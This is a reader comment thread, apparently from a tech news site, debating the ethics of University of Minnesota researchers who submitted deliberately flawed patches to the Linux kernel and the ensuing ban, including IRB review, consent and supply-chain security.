Place your bets...
that this was a CCP sponsored/encouraged attempt at "supply chain' code repository compromise?
Computer scientists at the University of Minnesota theorized they could sneak vulnerabilities into open-source software – but when they tried subverting the Linux kernel, it backfired spectacularly. And now their entire school – or at least anyone using a umn.edu email address – has been banned from offering future Linux …
Still, one should question whether the policy of "Don't probe possible vulnerabilities because it might upset us" is such a great idea in today's infosec security targeting world.
As noted in the story, making automatic assumptions on code quality strictly based on sourcing locations or personal accreditations is leaving the channel open to possible hacking (cough, SolarWinds and Git, cough).
In today's aggressive world we need better. A lot better. Probing vulnerabilities is what white hats do. That's their job. Whinging about the fact that they had the nerve to target *you* didn't fix your potential vulnerabilities.
I think that comment is missing the point.
"Still, one should question whether the policy of "Don't probe possible vulnerabilities because it might upset us" is such a great idea in today's infosec security targeting world."
Probing vulnerabilities in the code is important, and the Linux community doesn't have a problem with people doing that. Nor is there a problem looking at the ways people operate and suggesting that such ways lead to security problems. The key is that observation of others is good and probing of your own systems running others' code is good. Probing others' systems without permission is a very different story.
Consider a parallel. Penetration testing is important to ensure that security procedures are sufficient and followed. Hiring a penetration tester is a good idea. However, being a penetration tester of someone who didn't agree to it is not. At best, you have people angry at you though fixing problems you've demonstrated. At worst, you end up in jail. If these researchers had gained the agreement of someone in authority on the team that they would run the experiment, the community would probably be reacting very differently. They didn't even try to get permission.
Except it was not a medical science experiment, and Linux kernel patches don't make people sick, so chill down on the grandstanding. For a start, Linux developers don't take the Hippocratic oath.
If you replace anybody's words by your own, then yes, you can decide arbitrarily that anybody is a monster. It doesn't make you right.
Indeed. However the Hypocratic oath is a popular misconception. It exists almost entirely in the imagination of Hollywood screenplays, along with throwing with throwing motherboards in the air. Doctors and medical staff are bound by laws that long ago transcended the fanciful notions of the classical Greek scholar.
In Germany you become a doctor (of medicine) when the members of your review board shake your hand and welcome you as a colleague - and the state then issues your license. There is no oath. You are bound by our constitution.I
Yes, I should get out more, but where else can apply my ability to Google stuff?
"... you are confusing machines with people. Bugs in code are not equal to bugs in people."
But isn't one of the bones of contention here that the ethics' board and/or the researchers appeared to have made the mistake of confusing people with machines? If the aim was to see whether the Linux development process could be subverted, then the subjects under test here would actually be the community of developers, rather than the Linux kernel as such (i.e. people, not machines).
Like all experiments involving human subjects, any serious ethical approval process should have subjected this proposal to a much more rigorous assessment, especially given the absence of consent (as well as the significant risk of high-profile reputational damage). There are more ethical ways of conducting this kind of research (cf. penetration testing). If I had been on the ethics approval panel in question, I would have insisted on major changes to the approach, with safeguards for the experimental subjects, before even considering the possibility of approval.
[The connection with medical research is that that was where ethical considerations were first taken seriously, so it is natural to use medical analogies when discussing research ethics.]
As someone who sits on a university ethics committee, it would not surprise me if the majority of the ethics committee involved didn't really understand the implications of the research project they were reviewing. It's likely to be made up of predominantly social science and humanities staff whose specialist areas are a long way from this. Two worlds and all that. Yet another reason why we need computing staff to engage willingly with the ethics process to the extent of actually joining the committees.
This post has been deleted by its author
A social experiment, yes, but a needless one. We already know that malicious code can be sneaked into projects; it has happened, and is sometimes detected in time.
The experiment proves nothing, causes extra work for the volunteer maintainers of Linux, and basically says, "My PhD 'research' is more important than your open source project". The IRB should be ashamed of themselves for allowing this. The first question they should have asked is, "Is what you would learn worth the deliberate disruption of a volunteer organization?" The answer in this case is a resounding "No!"
It's worth remembering that this "Volunteer organisation" is maintaining code used to run the server (and other) infrastructure of many of the largest corporations and government departments in the world. It's also likely used in most of the hardware providing internet and network connectivity to those companies and consumers. It's important that good security practices are used, and that those practices are tested.
It's not good enough to only accept submissions from certain email domains. You don't know if the servers running email on those domains have been compromised in any way. You might think you are getting good code from john.smith@ibm.com, but john.smith@ibm.com might be some hacker from some country that has a major grievance with you..
Is this experiment ethical? I don't know. It's certainly not good for the people conducting the experiment to offend the test subjects.
However, I think the reaction is over the top and slightly concerning. Yes, the changes introduced were relatively harmless, so the maintainers probably do feel their time was wasted. However, one, or more of the changes could have been malicious. Checking code for security reasons is, IMO, never a waste of time even if you find no security issues.
> It's not good enough to only accept submissions from certain email domains
The Linux Kernel isn't doing that.
> However, I think the reaction is over the top and slightly concerning
The reaction - banning the entire institution - is actually one of the "fixes" mooted in the researchers own paper - only taking commits from trusted institutions.
> Checking code for security reasons is, IMO, never a waste of time even if you find no security issues.
I agree. On the other hand, this research wasted time that could have been spent catching other, actually malicious, commits.
Wasted time? OK, but at most it's a few hours of people's time. Irrespective of the research itself, the exposure that this has had, and the increased awareness it has generated is out of all proportion - in a positive sense - to any time wasted. The commenter in the original story was right, this is an emotional, rather childish reaction to a real issue that should be addressed. Yes we would all be annoyed and feel a bit of a tool in this situation. But that is not a professional or effective way to deal with this. As usual at the reg, the fact that it's regarding the Linux kernel, tribal loyalty means a fair proportion of readers immediately decided it's a terrible thing to do.
This is the world's most used software, anything that highlights or even suggests the potential for security issues is a good thing. This is especially true here given the very trivial negative consequences arising from the study. If people can't accept that, I would question whether tribal feelings aren't perhaps clouding their objectivity.
If you really think only "a few hours of people's time [were wasted]", I suggest you "waste" your own time and read in to what actually happened. This is a nice starting point:
https://lore.kernel.org/linux-nfs/YH/8jcoC1ffuksrf@kroah.com/
They submitted a number of patches, and each of them had to be re-reviewed not just for their validity when they were each submitted, but their validity compared to the current state of the code, where patches to the patched code or other bits that utilize the code must also be reviewed. Some of their commits fixed legitimate bugs while introducing others, so the parts that were fixed need to be retained while the parts that introduced new bugs or no new functionality at all need to be culled. It is not a simple process due to the complexity of the kernel.
There is also the case of the attitude of the two students, which was... let's say less than humble. They did not approach this situation in a way that would be conducive to all parties. Aditya accused Greg of slander when he did not trust the students' latest patchset, since they had submitted bogus patches immediately prior; patches that they knew were bogus, since they based their entire paper around it.
Perhaps you don't know how much real effort goes into the review processes around the Linux kernel. But in either case, their behavior was unwelcome to the community, potentially destructive since some of their patches made it to stable branches, and overall not helpful to the broader issue. As shown, it did nothing but create more work for the maintainers and hold up legitimate patches and releases from being reviewed.
My main takeaway here is not that security is bad, or that auditing is bad, or that redteaming is bad. The problem is that they attempted to audit something that we essentially already know is vulnerable—manual human-reviewed patches. And it's an open mailing list, they could have just analyzed existing patches that were found to be bad, instead of this ploy. The situation could be a lot better for submitting patches to the kernel, but it's the way that the big hitters are used to and it does still work. Until someone comes up with a better method with more automated safeguards and checks in place, the human element will still be a big factor in deciding what does and doesn't go into the kernel.
> Wasted time? OK, but at most it's a few hours of people's time
I see you've not looked into what actually happened then. It was more than a few hours of people's time.
> this is an emotional, rather childish reaction to a real issue that should be addressed.
I'll say it again - the action that was taken was *exactly* the action suggested by the researchers in their own paper.
They recommended a course of action to improve things, and after one of the students accused Greg K-H of slander (because he criticised one of their bunk patches), he followed their recommendations.
> As usual at the reg, the fact that it's regarding the Linux kernel, tribal loyalty means a fair proportion of readers immediately decided it's a terrible thing to do.
Or, an alternative view, is that it's nothing to do with the Reg, and in fact your views on the way the kernel handles things just doesn't tally with the majority. There're a lot of things the kernel team don't handle particularly well - this isn't one of them IMO.
> This is especially true here given the very trivial negative consequences arising from the study.
Ok, and what about the *next* study? If this behaviour is deemed ethical/acceptable it follows that there will be a next one.
Not to mention, of course, that all this happened after the study, yet bunk patches were still being submitted. It's in the mail thread linked in the article. The paper was up, the deed was (in effect) done, and then the students started submitting bunk patches again.
I don't think the disagreement is a matter of objectivity, in your case it might be that you've skim-read a single source and missed some fairly key points.
An Institutional Research Board typically has a very narrow scope: that of preventing "unethical" experiments on students or unnecessary access to their records. This research project would have fallen outside that scope. It is true that the students have now suffered the consequences ...
While I fully understand that a social experiment needs the 'target' to be unaware of said experiment to prove the point, I would certainly agree that there are a lot of ethical conundrums here. The researchers probably targeted the Linux kernel because it is used in so many places and by that virtue is a sensitive project, and also because it has a lot of traffic and as such, small changes that could introduce problems can potentially slip by under the radar.
But that said, there's a distinct ethical problem here... because the project relies on volunteers who are passionate about their work, wasting their time is in itself technically unethical. I would certainly question the ethics panel at UMN and how they came to their conclusions.
If they wanted to do this right they should have informed the leadership and got permission, then placed the code somewhere that the community could review it and see if anyone caught the flaws. They did not!
We did a similar experiment here at my work. We did a phishing email experiment. Leadership and all of IT were aware but the user community was not. It was a success and pissed off no one.
I agree with the OP in this thread. These individuals should be thoroughly investigated for ties to the CCP.
This does not pass the smell test.
I also agree with the reaction, emotional? Sure! But if there is no pain for the University then their oversight will not get any better. If it were me I'd ban them from committing anything to the OSS community for 10 years. Try recruiting Computer Science students and faculty when they know none of their work can be contributed to the OSS community. This is the problem with US Universities, there is a consistent record of bad behavior, shoddy research, corrupt wasting of the peoples money, trampling on the rights of students and faculty (yes, a minority, but...) and there are almost never any consequence!
> and reacting emotionally
On the contrary, Kroah-Hartman's initial response was engagement, and the story did not leap straight to the ban. As the rather more detailed ZDNet article says:
'You might think that these graduate students might get the hint. They didn't. One of the researchers, Aditya Pakki, doubled down. Pakki sent Kroah-Hartman a message stating, "I respectfully ask you to cease and desist from making wild accusations that are bordering on slander." He also claimed these patches were the result of a new static analyzer he'd written. Pakki closed, "I will not be sending any more patches due to the attitude that is not only unwelcome but also intimidating to newbies and non-experts."Kroah-Hartman had had enough. He replied:'
and THEN banned the Uni, as the ethics committee refused to intervene.
See https://www.zdnet.com/article/greg-kroah-hartman-bans-university-of-minnesota-from-linux-development-for-deliberately-buggy-patches/
"and THEN banned the Uni, as the ethics committee refused to intervene."
When the department finally issued a statement it was the most anodyne they could have got away with. An apology at this stage would have been appropriate pending the results of an investigation.
White Hats ask permission before they test - typically high up so advanced knowledge doesn't change the results, and also because it avoids pesky things like charges under the Computer Misuse Act.
If they do NOT ask permission, their targets are justified to take their claims to be "WHITE" hat after they've been caught with a liberal helping of salt, and so may the courts if it gets that far. Or would you believe a burglar you caught in your house to be "just testing your security free of charge, guv"?
Thats a naive statement. Its possible to get quiet co-operation for these sort of activities if the approach is right. It happens all the time in corporate environments.
This was lazy unethical behaviour - I suspect because they couldn't be bothered to get co-operation or were frightened of being told no.
It works all the time. If you're going to penetration test someone who asked for it, you coordinate with the person who hired you that you're going to do it. You don't tell them all the details, but they need to know who you are and at least a range of time you might do the penetration. That's so that, if you fail to penetrate and end up in the security office or the police station, they know to vouch for you.
These researchers didn't "get caught", rather they published a paper. Over the years they have published a lot of good and valuable papers and submitted many patches to fix real kernel bugs and otherwise improve the kernel. See for yourself: https://lkml.org/lkml/2021/4/21/454. (Maintainers replying to these proposed reverts are pretty much all saying "don't revert it, it's a good patch" or "it does no harm".)
It is clear that these guys are not bad guys. They have done good things for Linux, and they were in the process of trying to do another good thing when they made a mistake. Why has an angry mob now set out to destroy the careers of these good people? Surely we are smarter than that.
Just read that thread and a few others; actually, a lot of their other patches were rejected as invalid (there were an awful lot of them). It's wasting a lot of time of a lot of people, and they weren't described as coming from a static analysis tool, which is part of the problem. I think Greg KH is right on this one.
"a lot of their other patches were rejected as invalid"
I have read the thread, have you? "A lot" is simply wrong. I saw one where they followed the api documentation to the letter. The documentation says:
* If this function returns an error, kobject_put() must be called to
* properly clean up the memory associated with the object. This is the
* same type of error handling after a call to kobject_add() and kobject
* lifetime rules are the same here.
so they submitted a patch to change a kfree to a kobject_put as the documentation directs. The patch was reviewed and accepted. In this case, the documentation was wrong.
There are precious few others. The count might be up as high as two by now. Against this there are a lot (objectively true) of real bug fixes where maintainers either NACKed the revert or said they would just have to do the fix over again if it was reverted.
They got caught after they published a paper. It is akin to criminals getting caught after bragging about their crimes.
I can accept that their intentions were not malicious however they willingly, knowingly and without authorization introduced security vulnerabilities into a Linux kernel which is computer crime by any definition. How can one be sure that an organized crime group or a government organization did not subvert their efforts to stealthily introduce vulnerabilities into the Linux kernel (there is no doubt that they were doing exactly that) to use it for nefarious purposes? How can we be sure that their work was not secretly sponsored e.g. by the NSA?
As an example, what if someone works for a bank and decides to test the bank's security systems by moving some of the money into a personal account without telling anyone? What if there are several "bankers" working together to get this job done? And then they publish their "findings" online? Would anyone in the world be surprised if their "careers" were ruined as a result even if no money was spent and they claimed they were planning to return everything?
It is up to the researchers now to prove they were not guilty but imho they were rightly banned and shamed to discourage any such practices. The uni knew about it and approved, rightly to be banned too.
I disagree with "They got caught after they published a paper."
The article suggests that the paper itself tells how they contacted maintainers to assure malign patches didn't make it into the kernel. In other words, they admitted to their actions prior to publishing the paper.
Which also means that this misstates what happened: "they willingly, knowingly and without authorization introduced security vulnerabilities". Technically they tested whether they could, but withdrew the changes prior to commit.
"what if someone works for a bank and decides to test the bank's security systems by moving some of the money into a personal account without telling anyone" is a flawed analogy. A better comparison would be a developer at the bank creating software that could do that, with the permission of their manager. Prior to the code going live they would reveal and remove that code and initiate a review of code validation and data security practices as their actions should have been spotted prior to their admission.
Which is something I've almost done. I just worked it as a theoretical exercise rather than writing the malicious code, which also meant I didn't need managerial approval and could get the necessary process changes without ever putting the systems at risk. But I knew the existing process (and information security practices and controls) from the inside.
For something like the linux kernel it's insufficient to sit externally going, "I could do that" and far more effective to demonstrate by doing it.
"It is clear that these guys are not bad guys."
It's far from clear that these guys are not bad guys. It's very clear that anything they've contributed is not to be trusted which is why Greg K-H has been put to the trouble of stripping it all out.
And what, now, is going to be the value of a University of Minnesota CS degree after the department has trashed its reputation?
"It is clear that these guys are not bad guys."
Is it? One of the longest use tactics of espionage is to infiltrate and act as a good and decent citizen up to the point of fulfilling your mission. i.e. the 9/11 terrorists.
If their careers are destroyed, no one did that but them!
>Still, one should question whether the policy of "Don't probe possible vulnerabilities because it might upset us" is such a great idea in today's infosec security targeting world.
Nope, that's "Don't try a supply chain attack on unsuspecting victims because it is a criminal offence and you will go to jail to spend time with other criminals". These guys are lucky to get away so easily, I can only assume they did not make it up and their stupidity was natural.
I am more worried about this part though:
>>Katie Moussouris, CEO of Luta Security, voiced a similar option, calling the response an "emotional overreaction" and arguing that the findings have value from a national security perspective.
If various governmental agencies conclude that the Linux kernel is a "fair game" / valid target "from a national security perspective" we will all have a hard time.
>> If various governmental agencies conclude that the Linux kernel is a "fair game" / valid target "from a national security perspective" we will all have a hard time.
Surely, you are not that naive? If various government agencies are NOT targeting Linux/GNU, then they are not doing their jobs.
Sorry, but that's a naive thing to say. This is what the NSA's (and various other unnamed acronym agencies across the world) job *is*. I have to agree with Katie on the view that this *is* a national security issue, and it *is* important to make sure this doesn't happen.
*HOW* this was done (i.e. the research) and executed is highly questionable.
>> If various governmental agencies conclude that the Linux kernel is a "fair game" / valid target "from a national security perspective" we will all have a hard time.
>Surely, you are not that naive? If various government agencies are NOT targeting Linux/GNU, then they are not doing their jobs.
Surely there are various dynamically updated catalogues of Linux 0-days in various government agencies and they can always approach specialists when they need to hack high-profile Linux targets.
What I mean, is that to the best of my knowledge no state actor tried to execute a concerted supply chain attack on the Linux kernel. A successful attack could allow for targeted or mass snooping or sabotage on a worldwide scale but when discovered, it would be easier than usual to trace the instigator and the backlash would be colossal.
No state actor is likely to admit executing a concerted supply chain attack on the Linux Kernal. Even if they did pull something off then it'd probably look the Heartbleed bug in OpenSSL; it is certainly not going to be submitted by bugInsertAttempt@nsa.gov
I mean, you do realise that these are entities that produce perfectly plausible covers for people when they want them, complete with totally legitimate credit cards, passports etc as a matter of course? No online only community has a hope of totally preventing infiltration by government because all of a sudden with nation state level resources things in the security landscape that you thought were certainties may become uncertain without warning.
All of the subjects in the subject line know how to get around domain-name and IP restrictions. That's a pretty bad way to enforce security of the jewels.
Many researchers have run afoul of authorities when they probed some product. Witness Randall Schwartz who exposed security vulnerabilities at Intel and was prosecuted.
It's the corporate PHB who are the most dangerous to security. They want profits over competence.
Lots of people are hanging a false choice argument that punishing the uni that approved this amounts denying that researchers should be able to look at the process as well as the code when it comes to kernel security.
Yeah, developers can try to make submissions that get around the crude email block. That should be your first clue this was a political move to punish the Uni for screwing up. That doesn't mean the actual reviewers aren't also doing additional screening. They are, and were before, now they just have one more dumb line on the checklist.
Before the Uni approved this, they should have checked with the kernel team to see if there was an established processes for this, and respected the teams wishes by not launching an attempt to subvert the process without a green light from the higher ups. That doesn't mean the kernel team should or can block all such research, or that the Uni couldn't publish their concerns or how the process is handled.
Instead the Uni clearly has it's own process issues to address, as their "dont give them a chance to say no" process has predictably left them wearing their own ass for a hat.
I suspect that ban might get rolled back if they publish and stick to some reasonable guidelines for campus sanctioned research. We'll see I guess, once steam stops shooing from Linus' ears.
One last point worth raising, the kernel teams response should probably treat Uni researchers the same regardless of their nationality. Do we really want them setting a precedent that Uni's in China, Iran, and Russia can attempt unauthorized penetrations without sanctions? Or out of all of the possibilities is maybe expecting a Uni level organization to get prior consent not such a bad option?
I'm unhappy about this for several reasons:
1. The university's apparent belief that research can only be unethical if it involves human subjects is just plain wrong. This university isn't the only one that has this opinion (I have first-hand experience of several British universities), but it needs to be nuked from orbit.
2. The "we're open source so our time is more valuable than anyone else" attitude is really quite poor. It looks as if there is a "trust but don't verify" system going on, which this research has shown up.
3. As mentioned by several commentards so far, banning on the basis of email domain is just security theatre, which leads back to point 2 above.
@Intractable Potsherd
" The "we're open source so our time is more valuable than anyone else" attitude is really quite poor."
Or maybe that its open source and a lot of people are working on this in their "spare" time e.g. have another job & work on open source for reasons such as general coding enjoyment, helping the community, etc, etc
Yes, I know some open source coders do get financial support - but not many.
"Yes, I know some open source coders do get financial support - but not many."
Don't confuse number of contributors with number of contributions, at least as far as the Linux kernel is concerned. There are regular reports on who writes the Linux kernel. The top contributors in terms of actual material contributed are corporate.
>2. The "we're open source so our time is more valuable than anyone else" attitude is really quite poor. It looks as if there is a "trust but don't verify" system going on, which this research has shown up.
Nope, that's just "we are not paid to clean up your mess".
By publishing the details of the contributions (and thus dates), they have effectively given evidence of maleficence, thus any corporation who had downtime could essentially have a field day.
Hell, any dodgy corporation that didn't have downtime could simply fire off a threatening letter in the hopes of a quiet settlement.
The "we're open source so our time is more valuable than anyone else" attitude simply comes from the fact that a lot of this time is people doing the work on a volunteer basis, without any payment.
Just to give a more real-world metaphor, can you imagine what would happen if you went into a soup kitchen and said "I've peed in one of the stews you're about to feed to people - but don't worry, nobody will ever eat it because I've just told you about it, it's just a scientific experiment to test for a vulnerability in your processes"?
Point 3 leads back to point 1, it's not security theatre in that sense, it is blocking explicitly the organisation whose processes are flawed.
I do have some sympathy for the IRB, they are generally there for looking at human research (animal research too in the places that do it), which is very important. It may simply not have occurred to them this was something that needed oversight (which brings us back to point 1, because the institution as a whole must realise there is a need for ethics beyond the medical faculty).
> "The university's apparent belief that research can only be unethical if it involves human subjects is just plain wrong. "
I think it's the apparent belief that is wrong. The University will know that things other than human subject research can be unethical. In fact, in this case, the problem is likely that they hadn't worked out that it was effectively human subject research. My guess is they read "tool and method for discovering security flaws".
If they have read, "we will see if people can detect our attempt to deceive them", then the panel would have said no.
"If they have read, "we will see if people can detect our attempt to deceive them", then the panel would have said no."
I think that it is part of a job well done to go further than what is written in bold in the front page. After all, even people that has no mischief in mind can describe things in a confusing way.
The university's apparent belief that research can only be unethical if it involves human subjects is just plain wrong.
That appearance is what's "just plain wrong". HSR (human-subjects research) is only one of the concerns of the IRB at any accredited US university. I haven't read the paper to find the authors' verbatim statement about IRB review, but it sounds like they don't understand it either.
They may have misled the IRB; the IRB panel at Minnesota which reviewed this project may not have been very good. But IRBs are not solely concerned with HSR.
I've read the replies to my post, and I agree with some of them (and upvoted accordingly). I don't completely agree with the defences of the response, but I can see the thought-processes behind the defences and can see that they are well-meaning.
However, far too little opprobrium is being focused on the ethics board. With the importance of IT in today's world, projects should be scrutinised as hard as medical research. There should be a mixture of expert and lay people on the committees to give everything a really solid review and power to recommend change or not give approval. Publication of results should be dependent on ethics approval having been given as we are (slowly) getting to in medical research. This is an opportunity to learn.
I suspect the domain name and IP restrictions are really making a point loudly. The people involved in maintaining the project know this isn't so much a block as a way of annoying and making the university aware that they overstepped the mark. Otherwise I imagine they would give a half hearted apology and then carry on as if nothing had happened.
Blocking the Uni was not about security! That can be addressed in another form. What it was about is putting some pain on them for approving an absolutely stupid idea! Make them think about and improve their review process. It boggles the mind that none of these "over educated, shit heads!" thought this was a bad ideas!
I want to avoid using the names of the participants to draw any such conclusions (i.e. that the CCP was behind the research); however, open source projects and Linux itself have MANY potential "enemies", i.e. people with something to lose when it is successful, and so do the people and governments that make use of Linux (and open source software) in one form or another. including what is probably more than HALF of cell phone users.
Now that this "experiment" has happened, and it has NECESSARILY BACKFIRED, eyes are open and precautions WILL be taken.
I just hope that it does NOT make free (as in freedom) software LESS FREE in the process.
Guilt by association? Because figuring out guilt by guilt is just too time consuming and bothersome. The result of which is actually less security because it is takes the easy way. Perhaps they are just a bit arrogant, daft, and under educated about actual security pentesting procedure.
Did you know there is no shortage of master race members who have sold out to the CCP for cash?
This post has been deleted by its author
It'll be fun watching you spend hours trying to get a locksmith out to fix your locks. Then, when they eventually arrive, jump out of the bushes and shout "Surprise! I was only testing your door locking procedures!" and you can then carry on as normal, with a smile on your face, having wasted hours of your life trying to sort something out that was completely unnecessary ...
This post has been deleted by its author
>I'll quality control the locks to your house next time you're car isn't in the drive
Go for it....
Seriously, has nobody here ever had to work with a competent QA department? Those characters spend their entire lives devising ways to break my creations and they don't always play fair. They seem to derive a lot of pleasure from seeing how quickly they can break a new release.
Despite the professional enmity this sort of negative behavior engenders I recognize it as an essential part of development. I respect them even as I hate them (and off duty we'er actually friends....).
If the researchers informed the maintainers after the email and before it even became a commit then what was learned? If they wanted to see if such a patch would be accepted then you would think they would let the kernel review process happen, let it get past some level of scrutiny and then stop it at a late stage.
Yes, this would be far more annoying, but at least it would actually probe if the project would catch the malicious code. Perhaps I misunderstood the article?
They wasted the time of every maintainer who read their submission. And since a very large number of patches have to be rolled back, clearly "the patches never got into the code base" is an inaccurate statement. Moreover, some of the suspect patches have had subsequent patches made on top of them, which makes rollback even more onerous.
The IRB at UMN screwed up. The experiment was aimed at human systems. This wasn't a probe at some toolchain; it was an attempt to see if people could be manipulated into approving the injection of subtle bugs that turned immature (not exploitable) issues into exploitable use-after-free bugs. "The project" isn't some black box, some machine; it's people. Manipulation of humans requires full review, not a waiver, and it required affirmative permission from the most senior person(s) involved in Linux kernel change approval.
"since a very large number of patches have to be rolled back..."
Doesn't look like that: https://lkml.org/lkml/2021/4/21/454
Maintainers are mostly NACKing the propoosed reverts, or stating that no harm is done.
What is true: a large number of patches need to be reviewed. But that was always true, and arguably review has gotten slack lately. Howls of protest over the simple proof of that isn't going to fix it.
I can say it would be OK to test life support systems by unplugging the patients from them to see the effects and that would be still acceptable if you plug the patient back in time. Otherwise how can you be sure it really helps the patients ? Or actually lighting a controlled fire into a crowded place to ceck how fast people can evacuate the building.
https://en.wikipedia.org/wiki/Institutional_review_board is worth the check.
As the article noted:
"The paper describes how the authors submitted what's described as subtly subversive code contributions that would introduce error conditions into the operating system software, and it claims the researchers subsequently contacted Linux maintainers to prevent any bad code ending up in an official release of the kernel.
"It further states that the experiment was vetted by the university's Institutional Review Board (IRB), which determined that the project did not constitute human research and thus granted an ethical review waiver."
Thats an awful lot of files for things which never made it into the kernel apparently. Which makes me wonder if by reverting anything from U of M they are actually just getting rid of legitimate stuff, because the research stuff never made it in. I looked at a few of the, and they dont look either malicious or no-ops. So I am puzzled.
> what will happen is that all the stuff from U of M will get ripped out, and then from that stuff other people will consider what's valuable, what's not, and re-submit the good stuff
And - just to make your point really clear - UofM lose the credit for those changes and can't brag about them in their IT course prospectuses etc.
Bragging about this in their prospectus wouldn't look too good anyway. Admitting it would be ethical - it would tell the candidates to look elsewhere if they don't want the University's reputation hung around their necks when they graduate. But it seems their motto is "Any way but Ethics".
I think they have concluded that as the uni is a bad faith actor so they now need to double check everything in case they missed something the first time round. In light of the actions of the researcher they can't be certain of the boundaries that were set and that nothing had been done previously. A bit belt and braces but in reality in IT security all anyone can say is I have not found an intruder / backdoor etc but there is no guarantee that there isn't one.
> pointed to Kroah-Hartman's remarks about rejecting future contributions from University of Minnesota email addresses and argued that making trust decisions on the basis of email domains rather than confirmed code correctness is a more noteworthy problem.
Mister Valsorda doesn't understand the ban at all, just because somebody isn't banned doesn't mean they won't go through peer review before the merge.
What happened, is that UM proved themselves to be wholly untrustworthy, both on the "experiments on humans", and "keeping researchers from doing unethical experiments" fronts.
The easiest way to subvert software is to go to the distribution or more low profile infrastructure. Ethics are of course a very serious obstacle, but what about a (large) local government with a massive national security apparatus. They send your company a "request" to do XYZ to code UVW distributed to ABC. They do this in the form of a national security letter containing a non-disclosure clause.
Now you have several choices: a) you blab publicly and go 10..25 years to jail, or b) you refuse to cooperate and the national security threat database suddenly includes your company and you personally, or c) you reluctantly do as you are told.
Some choice, don't you think?
Even better. Massively undercut your target orgs outsourced support costs, then take the sloppy Network Admin approach and install a network management tool like Kaseya that has a local agent on each box and deploy the management server off-site / in a different hosting setup then push whatever malicious MSI packages you like when you like.
The only secure way to monitor your network is to not monitor it and just push / ingest logs to a SEIM server.
If you install agents on your endpoints and servers that are two way, you're increasing your attack surface.
There are many passive ways to watch your network.
Nope, I don't think there was an overreaction at all.
I think it is justified to ban the Uni as they proved to be untrustworthy.
And that will be a lesson to others. Play fair, submit good code, and all will be well.
But if you do submit code in order to undermine the stability of a system, out you go, as you're clearly not trustworthy, and every single bit of code you've submitted, be subject to scrutiny (or better still) termination and removal from the system.
Which makes me wonder - closed source, how safe is it? What will happen if somebody on the inside deliberately injects some code for a backdoor or create some unstable condition, will this be detected and removed? What exactly will happen in this sort of scenario?
The closed source code for Windows XP and Windows Server 2003 was leaked online in September 2020 (Well at least enough to razzle dazzle it "tools/razzle.cmd"). So you could analyze that for possible backdoor code, but the reality is that there are enough accidental bugs that deliberately adding a backdoors would just be overkill.
The systemd-cancer is not a part of the kernel, it's just another init.
I've clearly spent too long in some parts where they speak a bit of a variant of the Queen's English, so initially my not quite yet awake brain picked that up as "The systemd-cancer is not a part of the kernel, it's just another, innit?"
Yes, coffee. Definitely need more coffee.
:)
These two are either some of the biggest idiots the academic world has ever seen, or they are pen-testing the Linux Kernel Project on behalf of Chinese intelligence services.[*]
Is being a completely irresponsible moron now a requirement for tenure in US Computer Science Uni Departments?
-----
[*] No, it's not as far-fetched as you might think it is.
That makes no sense.
I assume the Chinese intelligence services would rather not publish their findings if that was the case. Just get the bugs in, and carry on exploiting them later. They would definitely not publish their findings on a journal.
> They would definitely not publish their findings on a journal.
How confident are you in the use of the adverb definitely in this particular case?
You need to think that through a bit more. Hint: it has to look like legit "academic research".
On a related train of thought: I was counting down the time before someone would post a denial / justification / rationalization. One hour, that's how long it took.
Lame.
Funny, I was also waiting for someone to blow that particular horn. It was bound to happen, for reasons that must be clear to you, considering you're the one who did it.
And you can keep your contempt and hints and whatever else makes you sleep well and comfortably smug at night. Yet, a mess such as the one we are witnessing would not be sponsored by any intelligence agency: too noisy, self-defeating as an intrusion mechanism, AND wakes up your enemy. Lose, lose, lose.
I do not follow the mantra of "not attributing to malice...", but it is apt in this case.
Now, if you have a (war) drum to bang, and reason need not apply, do carry on.
> Yet, a mess such as the one we are witnessing would not be sponsored by any intelligence agency: too noisy, self-defeating as an intrusion mechanism, AND wakes up your enemy.
Tell me you're not trying this tired bullshit again, are you?
"It couldn't have been the Chinese, because if it were, they wouldn't get caught."
What enemy? The Linux Kernel enemy?
Is this the best whoever pays you could come up with?
Ask your boss for a new script.
Cue: "What about NSA and Cisco?" Now is the time. Go for it.
It can very well be the CCP instigated the idea to do the testing, but not for the reason you would think. Since the destruction of Huawei by the US administration I think the realisation in China about using Open Source as a protection mechanism for preventing these things to happen has grown a lot. It may have wanted to see how difficult it would be to make such subvertions in the code base and the effects of it. The massive amount of attack vectors in proprietary software and users hardly requires any inserting of vulnerabilities in Linux.
I can still remember when in 2008 Microsoft sent a anti piracy command that disabled all the XP running machines in the university where I worked and class was dismissed. That will have given them extra incentive to try and develop their own version of Linux at that point, which failed miserably.
I also had the unpleasant surprise of finding all of sourceforge blocked because Notepad++ had a page about supporting Tibet on it. My online discussion on MSM suddenly being cut off while discussing a topic on how drug use is considered a health issue in the Netherlands, how a Party bigwig that bumped into a foreign exchange student was protected from having any blame for it by the camera circuit failing that day and lots of red envelope scents all around.
Until 2012, China was actually trying to be more open in many regards, with calls for more creativity as a basis for a successful society. As creativity requires a certain level of questioning authority, that didn't quite pan out much, but there was a discussion and wide spread support for the idea before 2012.
Xi though has released the Nationalist genie from the bottle and dissent is being prosecuted around the board. The Xi clan has by now crushed all dissent within the party and has recently shown how effective its population suppression mechanism is during the pandemic. Every community having a gated access to a wall to fend of "criminals" and reporting the whereabouts of people (such as foreigners) if required.
If the 39 stratagems are anything to go by this may well have been a bit of both. See the response and learn from that. A lack of Ethics is hardly surprising in the US context and its similarity with the wild west capitalism of China and deep rooted corruption makes those two states very much alike. Anything is possible in a kleptocracy.
"the university's Institutional Review Board (IRB) ... determined that the project did not constitute human research and thus granted an ethical review waiver."
Nonsense. This clearly was human research. And it clearly needed review.
OK, it's psychological research, not "inject untested drugs in your arm" research, but the law - CFR 46.102 - doesn't make that distinction:
"d) Research means a systematic investigation, including research development, testing and evaluation, designed to develop or contribute to generalizable knowledge."
"f) Human subject means a living individual about whom an investigator (whether professional or student) conducting research obtains [...] data through intervention or interaction with the individual [....]. Interaction includes communication or interpersonal contact between investigator and subject."
The researchers communicated with the maintainers, as part of a systematic investigation designed to learn things. That makes this human research.
Now, after doing the review, the IRB may have decided to approve the research and waive the consent requirement. I think that would have been a mistake, but it would at least have been arguable. 46.116(d) lists 4 criteria that all have to be met to waive consent. They easily meet 3 of them. The one which is dodgy is "The waiver or alteration will not adversely affect the rights and welfare of the subjects".
The IRB clearly totally misunderstands their job, or are just useless at it, and they should all be fired from the IRB.
Or as another person put it, more succinctly, consent is important. The researchers didn't contact anyone and ask them if they would consent to be part of an experiment.
Deciding that other people's efforts don't matter as long as you think your ends justify your means? That makes you the bad guy.
WTF! What were they thinking?
